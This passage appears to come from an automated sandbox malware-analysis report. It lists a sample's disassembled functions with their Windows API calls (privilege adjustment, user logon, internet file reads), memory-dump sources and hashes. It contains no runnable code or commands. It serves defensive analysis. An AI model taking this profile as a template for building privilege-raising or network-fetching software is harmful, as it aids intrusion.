Instruction Fuzzy Hash: 5651AC71508311AFD310EF24DC85EABB7E8EF98750F10482DF995972A1EB30E949CB92

Function 00A6E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00A6E628

Strings

|, xrefs: 00A6E658
(, xrefs: 00A6E66E

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 8153dcdba007024aa4aa48ae4a949a94ad9ac9fe08441d297767de0df2048283
Instruction ID: 73e61e6bd149563d78884f8813cdce023d2e0ca6839f3240e40bd71b1704c925
Opcode Fuzzy Hash: 8153dcdba007024aa4aa48ae4a949a94ad9ac9fe08441d297767de0df2048283
Instruction Fuzzy Hash: 7D322579A007059FDB28CF59C481A6AB7F1FF48320B15C56EE89ADB3A1E770E941CB44

Function 00A822EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00A8180A,00000000), ref: 00A823E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00A82418

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: d2f5a9484a8b32c51d3f538190e8d17e12a402c061a3d1fdfd1c5cc03270bcc2
Instruction ID: 13366d1057c72cc04382b03afa4b53f37aa912f8f1d4eaba3a3bed64e54d0646
Opcode Fuzzy Hash: d2f5a9484a8b32c51d3f538190e8d17e12a402c061a3d1fdfd1c5cc03270bcc2
Instruction Fuzzy Hash: 6B41E471A04209BFEB20EF95DD85FBBB7BCEB40324F10406AFA41AA140EB759E419760

Function 00A7B3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00A7B40B
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00A7B465
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00A7B4B2

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: e0ba4ac6178b8fc45fbd3504f1f415e4fc57d2aa72e7862386e3df415805a1ec
Instruction ID: 3a0e34c17bcc957af65aa4b68cbe7bfe0f4131d583b53289cb20a5ae933221a0
Opcode Fuzzy Hash: e0ba4ac6178b8fc45fbd3504f1f415e4fc57d2aa72e7862386e3df415805a1ec
Instruction Fuzzy Hash: 59216075A00108EFCB00EFA5DC84AEEBBB8FF49310F1480AAE905EB351CB319956CB55

Function 00A687E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00A30DB6: std::exception::exception.LIBCMT ref: 00A30DEC
Part of subcall function 00A30DB6: __CxxThrowException@8.LIBCMT ref: 00A30E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A6882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A68858
GetLastError.KERNEL32 ref: 00A68865

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 51e7b98672bac31ff29e17fb50e14626edc6d4e09bd9b01d6a6fc9045003a8ed
Instruction ID: 97f124b4bd111d1e17633f764ee10420ad70497850cbc2c4c9882b9096e93a32
Opcode Fuzzy Hash: 51e7b98672bac31ff29e17fb50e14626edc6d4e09bd9b01d6a6fc9045003a8ed
Instruction Fuzzy Hash: BB118FB2514205AFE718DFA4DC85D6BB7FCEB44750B20862EF49597241EF74BC418B60

Function 00A6874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00A68774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00A6878B
FreeSid.ADVAPI32(?), ref: 00A6879B

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: d76b372590c5d84e277dcdc03079c18c817d87240f6e8a6a3e3d5a43ac5e09b7
Instruction ID: ed99ef34052aadaf83aa1d50a984b20dbb4a984e7def752f89e8f457d43baf8c
Opcode Fuzzy Hash: d76b372590c5d84e277dcdc03079c18c817d87240f6e8a6a3e3d5a43ac5e09b7
Instruction Fuzzy Hash: 2EF06D75A1130CBFDF00DFF4DC89ABEBBBCEF08201F1045A9A901E2181EB756A048B50

Function 00A7C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00A7C6FB
FindClose.KERNEL32(00000000), ref: 00A7C72B

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 55b809feb1d1d2d0fc120f5fab62a227fcd0fb8081f88cde461fc8e6286efbcb
Instruction ID: 47c60ef0c03d000cd0fe2350b8cc081aec0dfdc459cea86232120fa21c2b3b29
Opcode Fuzzy Hash: 55b809feb1d1d2d0fc120f5fab62a227fcd0fb8081f88cde461fc8e6286efbcb
Instruction Fuzzy Hash: DF118E726002009FDB10EF29D855A6AF7E8EF85320F00C51EF8A9C7290DB30A801CB81

Function 00A7A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00A89468,?,00A9FB84,?), ref: 00A7A097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00A89468,?,00A9FB84,?), ref: 00A7A0A9

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 84f9a0f396dbac198075b0893fdaa1d74b4528a6beb062e744297a958ea3cc46
Instruction ID: 3d4d64e274f2d22f92cb1a64d48f3dca92591b560f457632d36e26486fc0841b
Opcode Fuzzy Hash: 84f9a0f396dbac198075b0893fdaa1d74b4528a6beb062e744297a958ea3cc46
Instruction Fuzzy Hash: 98F08C3520522DBBDB21AFA4DC48FEE776CBF08361F008266F919D6181DA309A40CBA1

Function 00A681CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A68309), ref: 00A681E0
CloseHandle.KERNEL32(?,?,00A68309), ref: 00A681F2

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 683f5d738e0635699f2719c3173b553c939bad2acdd0c37838dcd29e14fc96fc
Instruction ID: f970feb3ceb1bdead4884df80d212242a1a99823465c94e4f41f9714ace24c06
Opcode Fuzzy Hash: 683f5d738e0635699f2719c3173b553c939bad2acdd0c37838dcd29e14fc96fc
Instruction Fuzzy Hash: A9E0B672111620AEE7256B60FC09D777BAEEB04310B24892AB8A6C4470DB62ACA1DB10

Function 00A3A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00A38D57,?,?,?,00000001), ref: 00A3A15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00A3A163

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 4801056496ff78d1bd9c9743009f6a702726632bdc8bf50f3835d6a033b61fc3
Instruction ID: ab8689731373996d45ec006f53712cc1c9673e96709cd1110ec4914bc5373d68
Opcode Fuzzy Hash: 4801056496ff78d1bd9c9743009f6a702726632bdc8bf50f3835d6a033b61fc3
Instruction Fuzzy Hash: 3EB09231254208EFCA006BE1EC09B8A3F68EB44BA2F404022F61DC8060CF6654A28A91

Function 00A3F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d89e808c22395bcb86f83e5cfc1ca98fd24276cbda232747064cbf30cb294b5
Instruction ID: 877e7ce4f2e37a33f22bcd8af37b0550ea25b5f8dee4964964df85494fb54690
Opcode Fuzzy Hash: 5d89e808c22395bcb86f83e5cfc1ca98fd24276cbda232747064cbf30cb294b5
Instruction Fuzzy Hash: C332F262D29F424DD7239634DC3233AA249AFB73D4F15D737F81AB59AAEB28C4834100

Function 00A4242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03686f39721b26b6f0b062e09e5a56eccbf6309c4c32736d5a33cf878a4a0f15
Instruction ID: ac48c29722aac79f58e7c9e49cb61f98b789deb002fa7bd9fa2931fe30ac3d8c
Opcode Fuzzy Hash: 03686f39721b26b6f0b062e09e5a56eccbf6309c4c32736d5a33cf878a4a0f15
Instruction Fuzzy Hash: 48B11320D2AF414DD76396398831336BB9CAFBB2C5F51D71BFC1674D62EB2185838241

Function 00A78889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00A7889B

Part of subcall function 00A3520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00A78F6E,00000000,?,?,?,?,00A7911F,00000000,?), ref: 00A35213
Part of subcall function 00A3520A: __aulldiv.LIBCMT ref: 00A35233

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 10baac5489c30f6bfc6d65139e5c76c28b1a4b6334f2735a09138985df2ec8e6
Instruction ID: 5a9ca9b235abaaf7b717e12c4e2761b9381fdc340d2872c878d9275b5a1e977c
Opcode Fuzzy Hash: 10baac5489c30f6bfc6d65139e5c76c28b1a4b6334f2735a09138985df2ec8e6
Instruction Fuzzy Hash: 1821A2326255108BC729CF69D841A52B3E1EBA5311B688E6DE0FACB2C0CA34A945CB54

Function 00A74C27 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00A74C4A

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 95b3df02212e5d8de6b9a2102770c80b5c9912880ac8dd25d621c074d3f1ecb4
Instruction ID: deb4bd23261049868c3eb87955273dec5b236d06465be1150a2637b0c2a3a04a
Opcode Fuzzy Hash: 95b3df02212e5d8de6b9a2102770c80b5c9912880ac8dd25d621c074d3f1ecb4
Instruction Fuzzy Hash: E4D05EA116520978FC1D07649E1FF7B0508E348782FD0C1497109CA0C1EF905C405032

Function 00A687B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00A68389), ref: 00A687D1

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: b4ea772b386621f83c53a9498ec8f9011e51f44f2bb53ff4b0984b8f2280eb60
Instruction ID: 563008ad0b145b003a5dc6e6c5f03d22ce16a2e285dbf2cc741bd4c6d794d09e
Opcode Fuzzy Hash: b4ea772b386621f83c53a9498ec8f9011e51f44f2bb53ff4b0984b8f2280eb60
Instruction Fuzzy Hash: 00D05E3226450EAFEF018EA4DC01EAE3B69EB04B01F408111FE15C50A1C775D835AB60

Function 00A3A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00A3A12A

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: e711638fcf1f793c1a172b3ef6dd127f3b3c62f362a649f9c5d58c168b43f650
Instruction ID: 8a0fdc1ce79b12bb69bcf76334b6dc07c99b816608be1ae84789d506ecc5bbb0
Opcode Fuzzy Hash: e711638fcf1f793c1a172b3ef6dd127f3b3c62f362a649f9c5d58c168b43f650
Instruction Fuzzy Hash: 0EA0123000010CEB8A001B91EC044457F5CD6001907004021F40C840218B3254514580

Function 00A28808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c70d1ab515f9ffdbf74011b56dd77700555ae94d04f0145eb1b211cd61d49032
Instruction ID: 20fa22ffaa7f621146d1d9eeb6920dd57074c207f2cbb710fc412191d197602d
Opcode Fuzzy Hash: c70d1ab515f9ffdbf74011b56dd77700555ae94d04f0145eb1b211cd61d49032
Instruction Fuzzy Hash: 75222330A056268BDF288B7CE59467C77B1FB01384F2A817AF9428B592DF789DD1C641

Function 00A321C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: dad8460d902510cb5c739df2966b42db773c6968dcdb23c4a4184637546adff8
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 66C172322051930ADF2D473A847417EFAA19EA37B1B1A076DF8B3CB1D4EE24D965D720

Function 00A325FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

